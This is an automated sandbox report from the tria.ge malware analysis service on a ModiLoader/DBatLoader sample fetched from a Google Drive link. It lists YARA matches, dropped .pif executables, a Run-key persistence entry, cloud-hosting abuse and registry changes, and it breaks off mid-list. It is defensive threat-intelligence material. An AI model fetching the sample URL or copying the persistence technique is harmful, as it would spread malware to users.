Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
214s -
max time network
213s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/02/2025, 07:51
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://drive.google.com/uc?export=download&id=1f5N2KUSixpDxaS-FXrVZwJQqbXgI7Zmp
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
https://drive.google.com/uc?export=download&id=1f5N2KUSixpDxaS-FXrVZwJQqbXgI7Zmp
Resource
win10v2004-20250129-en
General
-
Target
https://drive.google.com/uc?export=download&id=1f5N2KUSixpDxaS-FXrVZwJQqbXgI7Zmp
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/4848-511-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-519-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-531-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-567-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-573-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-521-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-576-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-586-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-582-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-581-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-535-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-574-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-534-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-569-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-622-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-619-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-614-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-561-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-560-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-559-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-606-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-605-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-556-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-546-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-547-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-516-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-540-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-584-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-525-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-568-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-618-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-621-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-558-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-563-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-533-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-557-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-603-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-552-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-595-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-589-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-539-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-578-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-536-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-564-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-620-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-617-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-562-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-532-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-530-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-551-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-537-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-529-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-523-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-515-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-528-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-524-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-526-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-517-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-514-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-518-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 behavioral1/memory/4848-522-0x0000000002C30000-0x0000000003C30000-memory.dmp modiloader_stage2 -
Executes dropped EXE 13 IoCs
pid Process 4504 alpha.pif 3644 phf.pif 4596 alpha.pif 4252 phf.pif 3992 awpha.pif 4848 AnyDesk.pif 4840 svchost.pif 5148 alpha.pif 5360 Upha.pif 5416 alpha.pif 5180 Upha.pif 4504 alpha.pif 3644 aken.pif -
Loads dropped DLL 1 IoCs
pid Process 4840 svchost.pif -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Flkgqskq = "C:\\Users\\Public\\Flkgqskq.url" AnyDesk.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 3 drive.google.com 6 drive.google.com 8 drive.google.com 9 drive.google.com 10 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 39031f00e902d5dfa323db02040000000000d70200003153505305d5cdd59c2e1b10939708002b2cf9ae0b02000012000000004100750074006f004c006900730074000000420000001e000000700072006f007000340032003900340039003600370032003900350000000000c3010000aea54e38e1ad8a4e8a9b7bea78fff1e9060000800000000001000000020000800100000001000000020000002000000000000000bb0014001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c000000000000000000000000000000000000008c00310000000000445a743e110050524f4752417e310000740009000400efbec5525961445a743e2e0000003f0000000000010000000000000000004a0000000000f3d8fe00500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000000000000000000000000000000000000000000001000000010000800100000004006900740065006d00000000000000000000000000000000000000000000000000000000000000000000000000000000001e1ade7f318ba54993b86be14cfa4943ffffffffffffffffffffffff00000000010000001f00530065006100720063006800200052006500730075006c0074007300200069006e002000500072006f006700720061006d002000460069006c006500730000000000000000000000000000000000000000000000000000000000003900000024000000004100750074006f006c0069007300740043006100630068006500540069006d006500000014000000d07df2970c0000007700000022000000004100750074006f006c00690073007400430061006300680065004b006500790000001f00000021000000530065006100720063006800200052006500730075006c0074007300200069006e002000500072006f006700720061006d002000460069006c006500730030000000000000000000000000000000741a595e96dfd3488d671733bcee28ba671b730433d90a4590e64acd2e9408fe2a0000001300efbe00000020000000000000000000000000000000000000000000000000010000000f030000 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000020000000100000000000000ffffffff OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000030000000100000000000000ffffffff OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "4" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Mode = "8" OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 63031f00e902d5dfa323db02040000000000d70200003153505305d5cdd59c2e1b10939708002b2cf9ae0b02000012000000004100750074006f004c006900730074000000420000001e000000700072006f007000340032003900340039003600370032003900350000000000c3010000aea54e38e1ad8a4e8a9b7bea78fff1e9060000800000000001000000020000800100000001000000020000002000000000000000bb0014001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c000000000000000000000000000000000000008c00310000000000445a743e110050524f4752417e310000740009000400efbec5525961445a743e2e0000003f0000000000010000000000000000004a0000000000f3d8fe00500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000000000000000000000000000000000000000000001000000010000800100000004006900740065006d00000000000000000000000000000000000000000000000000000000000000000000000000000000001e1ade7f318ba54993b86be14cfa4943ffffffffffffffffffffffff00000000010000001f00530065006100720063006800200052006500730075006c0074007300200069006e002000500072006f006700720061006d002000460069006c006500730000000000000000000000000000000000000000000000000000000000003900000024000000004100750074006f006c0069007300740043006100630068006500540069006d006500000014000000d07df2970c0000007700000022000000004100750074006f006c00690073007400430061006300680065004b006500790000001f00000021000000530065006100720063006800200052006500730075006c0074007300200069006e002000500072006f006700720061006d002000460069006c006500730030000000000000000000000000000000741a595e96dfd3488d671733bcee28ba671b730433d90a4590e64acd2e9408fe2a0000001300efbe00000020000000000000000000000000000000000000000000000000010000000f032a0000001900efbe1e1ade7f318ba54993b86be14cfa49436f73bebdf5342948abe8b550e65146c40f030000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupView = "0" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\FFlags = "18874433" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\TV_FolderType = "{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\IconSize = "32" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943} OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\TV_TopViewVersion = "0" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "6" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Sort = 0000000000000000000000000000000003000000901c6949177e1a10a91c08002b2ecda903000000ffffffff30f125b7ef471a10a5f102608c9eebac0e000000ffffffff30f125b7ef471a10a5f102608c9eebac0a00000001000000 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000ed30bdda43008947a7f8d013a47366226400000078000000 OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\FFlags = "1" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByKey:PID = "0" OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "5" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\TV_TopViewID = "{BDBE736F-34F5-4829-ABE8-B550E65146C4}" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg OpenWith.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\REQUIRED-PO-AND-COMPANY-PROFILE.GZ:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 3644 aken.pif 3644 aken.pif 4840 svchost.pif 3644 aken.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif 4840 svchost.pif -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4596 OpenWith.exe 3908 OpenWith.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4116 firefox.exe Token: SeDebugPrivilege 4116 firefox.exe Token: SeDebugPrivilege 4116 firefox.exe Token: SeRestorePrivilege 4728 7zG.exe Token: 35 4728 7zG.exe Token: SeSecurityPrivilege 4728 7zG.exe Token: SeSecurityPrivilege 4728 7zG.exe Token: SeBackupPrivilege 5000 svchost.exe Token: SeRestorePrivilege 5000 svchost.exe Token: SeSecurityPrivilege 5000 svchost.exe Token: SeTakeOwnershipPrivilege 5000 svchost.exe Token: 35 5000 svchost.exe Token: SeDebugPrivilege 4116 firefox.exe Token: SeDebugPrivilege 4116 firefox.exe Token: SeDebugPrivilege 4116 firefox.exe Token: SeDebugPrivilege 3644 aken.pif -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4728 7zG.exe -
Suspicious use of SetWindowsHookEx 41 IoCs
